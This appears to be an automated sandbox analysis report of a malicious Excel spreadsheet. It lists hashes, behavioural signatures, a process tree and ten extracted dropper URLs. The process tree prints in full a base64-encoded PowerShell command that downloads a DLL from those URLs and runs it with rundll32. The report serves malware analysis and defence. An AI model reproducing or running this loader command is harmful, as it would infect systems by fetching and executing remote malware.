Analysis

  • max time kernel
    133s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    19/11/2024, 18:39

General

  • Target

    75f04986c29db0ef075616785e5d4ef25f96df85fad4f21756544d2bb4a84da8.xls

  • Size

    141KB

  • MD5

    5289bde931b050914ce8995fa5630290

  • SHA1

    2389cf13ed4efb0bd93c76df46cafe068c3380d5

  • SHA256

    75f04986c29db0ef075616785e5d4ef25f96df85fad4f21756544d2bb4a84da8

  • SHA512

    a3e4836f09af00fa91742d1ef10be1aa69c0e580db06744f9a4fc0cdf1534ed291fb7e018ae8c72a81556db5a23501d4281f573ac693fa68d88b671a0e7395b3

  • SSDEEP

    3072:J7cKoSsxzNDZLDZjlbR868O8K0c03D38TehYTdeHVhjqabWHLtyeGx6Z84TI0GxL:9cKoSsxzNDZLDZjlbR868O8K0c03D38c

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://chupahfashion.com/eh6bwxk/bowptl/cLo9eq8v8Vht/

exe.dropper

http://ancyh.xyz/Fox-C/LxAhgyO3fMg/

exe.dropper

http://gravton-dev-cms.policyfest.com/Fox-C/BMOkGelwu/

exe.dropper

https://capitalui.futuristic.agency/wp-admin/hwi9bnmXFFm3doo/

exe.dropper

http://cptdmy.com/zqtr/zdJE0jEOxL/

exe.dropper

https://weviralyou.com/wp-content/yl5qV15jWWfaGdSZLR/

exe.dropper

https://megabyte-xtnegocios.com/ys3v1clw/AKm6Q9/

exe.dropper

https://vmsparamedical.com/urjk0xr/PhfwL/

exe.dropper

https://viprait.com/lag5gn/cdy6k/

exe.dropper

https://comingsoon.futuristic.agency/svg/p4xODmupFbHPnr/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 8 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\75f04986c29db0ef075616785e5d4ef25f96df85fad4f21756544d2bb4a84da8.xls"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:4152
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\programdata\ihofbnm.bat" "
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:1552
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -enc JAByAG8AdwBpAGYAaQB1AGQAPQAiAGgAdAB0AHAAOgAvAC8AYwBoAHUAcABhAGgAZgBhAHMAaABpAG8AbgAuAGMAbwBtAC8AZQBoADYAYgB3AHgAawAvAGIAbwB3AHAAdABsAC8AYwBMAG8AOQBlAHEAOAB2ADgAVgBoAHQALwAsAGgAdAB0AHAAOgAvAC8AYQBuAGMAeQBoAC4AeAB5AHoALwBGAG8AeAAtAEMALwBMAHgAQQBoAGcAeQBPADMAZgBNAGcALwAsAGgAdAB0AHAAOgAvAC8AZwByAGEAdgB0AG8AbgAtAGQAZQB2AC0AYwBtAHMALgBwAG8AbABpAGMAeQBmAGUAcwB0AC4AYwBvAG0ALwBGAG8AeAAtAEMALwBCAE0ATwBrAEcAZQBsAHcAdQAvACwAaAB0AHQAcABzADoALwAvAGMAYQBwAGkAdABhAGwAdQBpAC4AZgB1AHQAdQByAGkAcwB0AGkAYwAuAGEAZwBlAG4AYwB5AC8AdwBwAC0AYQBkAG0AaQBuAC8AaAB3AGkAOQBiAG4AbQBYAEYARgBtADMAZABvAG8ALwAsAGgAdAB0AHAAOgAvAC8AYwBwAHQAZABtAHkALgBjAG8AbQAvAHoAcQB0AHIALwB6AGQASgBFADAAagBFAE8AeABMAC8ALABoAHQAdABwAHMAOgAvAC8AdwBlAHYAaQByAGEAbAB5AG8AdQAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAHkAbAA1AHEAVgAxADUAagBXAFcAZgBhAEcAZABTAFoATABSAC8ALABoAHQAdABwAHMAOgAvAC8AbQBlAGcAYQBiAHkAdABlAC0AeAB0AG4AZQBnAG8AYwBpAG8AcwAuAGMAbwBtAC8AeQBzADMAdgAxAGMAbAB3AC8AQQBLAG0ANgBRADkALwAsAGgAdAB0AHAAcwA6AC8ALwB2AG0AcwBwAGEAcgBhAG0AZQBkAGkAYwBhAGwALgBjAG8AbQAvAHUAcgBqAGsAMAB4AHIALwBQAGgAZgB3AEwALwAsAGgAdAB0AHAAcwA6AC8ALwB2AGkAcAByAGEAaQB0AC4AYwBvAG0ALwBsAGEAZwA1AGcAbgAvAGMAZAB5ADYAawAvACwAaAB0AHQAcABzADoALwAvAGMAbwBtAGkAbgBnAHMAbwBvAG4ALgBmAHUAdAB1AHIAaQBzAHQAaQBjAC4AYQBnAGUAbgBjAHkALwBzAHYAZwAvAHAANAB4AE8ARABtAHUAcABGAGIASABQAG4AcgAvACIALgBTAHAAbABpAHQAKAAiACwAIgApADsAZgBvAHIAZQBhAGMAaAAoACQAcwB0ACAAaQBuACAAJAByAG8AdwBpAGYAaQB1AGQAKQB7ACQAcgByAHkAaQB1AGQAPQBHAGUAdAAtAFIAYQBuAGQAbwBtADsAJABmAGcAaABpAHUAcwA9AEcAZQB0AC0AUgBhAG4AZABvAG0AOwAgACQARwBzAHIARgBKAFkAagBkADUANAA2AGQAcwA9ACIAYwA6AFwAcAByAG8AZwByAGEAbQBkAGEAdABhAFwAIgArACQAcgByAHkAaQB1AGQAKwAiAC4AZABsAGwAIgA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQByAGkAIAAkAHMAdAAgAC0ATwB1AHQARgBpAGwAZQAgACQARwBzAHIARgBKAFkAagBkADUANAA2AGQAcwA7AGkAZgAoAFQAZQBzAHQALQBQAGEAdABoACAAJABHAHMAcgBGAEoAWQBqAGQANQA0ADYAZABzACkAewBpAGYAKAAoAEcAZQB0AC0ASQB0AGUAbQAgACQARwBzAHIARgBKAFkAagBkADUANAA2AGQAcwApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADUAMAAwADAAMAApAHsAJABnAGgARABEAEYASgBIAGsANQBmAD0AIgBjADoAXAB3AGkAbgBkAG8AdwBzAFwAcwB5AHMAdwBvAHcANgA0AFwAcgB1AG4AZABsAGwAMwAyAC4AZQB4AGUAIgA7ACQAdAB5AGkAZAB1AGkAcwBkAGYAZgA9ACQARwBzAHIARgBKAFkAagBkADUANAA2AGQAcwArACIALABmACIAKwAkAGYAZwBoAGkAdQBzADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACQAZwBoAEQARABGAEoASABrADUAZgAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIAAkAHQAeQBpAGQAdQBpAHMAZABmAGYAOwBiAHIAZQBhAGsAOwB9AH0AfQA=
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3924

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_koik5l4h.psx.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\programdata\ihofbnm.bat

    Filesize

    3KB

    MD5

    d7f8d77efca69f7600e190537d147b6c

    SHA1

    9709843ea19f342b3a95075588c4b6fdb688623d

    SHA256

    8fe05c046c282ee13765fb78ba5b27201571a74a46dbc901898255c111727caf

    SHA512

    dd975f74367e9ddaed18e0630556f14f8bd32f5e89ec13b92f933cbdfc32951e61b4da406407cb7e7cd37a2fe41726c200a0c1377ac8686f835eccfec599b5e2

  • memory/3924-96-0x0000026376420000-0x0000026376BC6000-memory.dmp

    Filesize

    7.6MB

  • memory/3924-86-0x0000026375660000-0x0000026375682000-memory.dmp

    Filesize

    136KB

  • memory/4152-3-0x00007FFD258F0000-0x00007FFD25900000-memory.dmp

    Filesize

    64KB

  • memory/4152-11-0x00007FFD65870000-0x00007FFD65A65000-memory.dmp

    Filesize

    2.0MB

  • memory/4152-5-0x00007FFD258F0000-0x00007FFD25900000-memory.dmp

    Filesize

    64KB

  • memory/4152-1-0x00007FFD6590D000-0x00007FFD6590E000-memory.dmp

    Filesize

    4KB

  • memory/4152-8-0x00007FFD258F0000-0x00007FFD25900000-memory.dmp

    Filesize

    64KB

  • memory/4152-10-0x00007FFD65870000-0x00007FFD65A65000-memory.dmp

    Filesize

    2.0MB

  • memory/4152-9-0x00007FFD65870000-0x00007FFD65A65000-memory.dmp

    Filesize

    2.0MB

  • memory/4152-13-0x00007FFD65870000-0x00007FFD65A65000-memory.dmp

    Filesize

    2.0MB

  • memory/4152-15-0x00007FFD65870000-0x00007FFD65A65000-memory.dmp

    Filesize

    2.0MB

  • memory/4152-16-0x00007FFD23040000-0x00007FFD23050000-memory.dmp

    Filesize

    64KB

  • memory/4152-12-0x00007FFD65870000-0x00007FFD65A65000-memory.dmp

    Filesize

    2.0MB

  • memory/4152-6-0x00007FFD65870000-0x00007FFD65A65000-memory.dmp

    Filesize

    2.0MB

  • memory/4152-14-0x00007FFD65870000-0x00007FFD65A65000-memory.dmp

    Filesize

    2.0MB

  • memory/4152-17-0x00007FFD23040000-0x00007FFD23050000-memory.dmp

    Filesize

    64KB

  • memory/4152-26-0x00007FFD65870000-0x00007FFD65A65000-memory.dmp

    Filesize

    2.0MB

  • memory/4152-27-0x00007FFD65870000-0x00007FFD65A65000-memory.dmp

    Filesize

    2.0MB

  • memory/4152-7-0x00007FFD65870000-0x00007FFD65A65000-memory.dmp

    Filesize

    2.0MB

  • memory/4152-4-0x00007FFD258F0000-0x00007FFD25900000-memory.dmp

    Filesize

    64KB

  • memory/4152-2-0x00007FFD65870000-0x00007FFD65A65000-memory.dmp

    Filesize

    2.0MB

  • memory/4152-0-0x00007FFD258F0000-0x00007FFD25900000-memory.dmp

    Filesize

    64KB

  • memory/4152-98-0x00007FFD65870000-0x00007FFD65A65000-memory.dmp

    Filesize

    2.0MB

  • memory/4152-99-0x00007FFD6590D000-0x00007FFD6590E000-memory.dmp

    Filesize

    4KB

  • memory/4152-100-0x00007FFD65870000-0x00007FFD65A65000-memory.dmp

    Filesize

    2.0MB

  • memory/4152-101-0x00007FFD65870000-0x00007FFD65A65000-memory.dmp

    Filesize

    2.0MB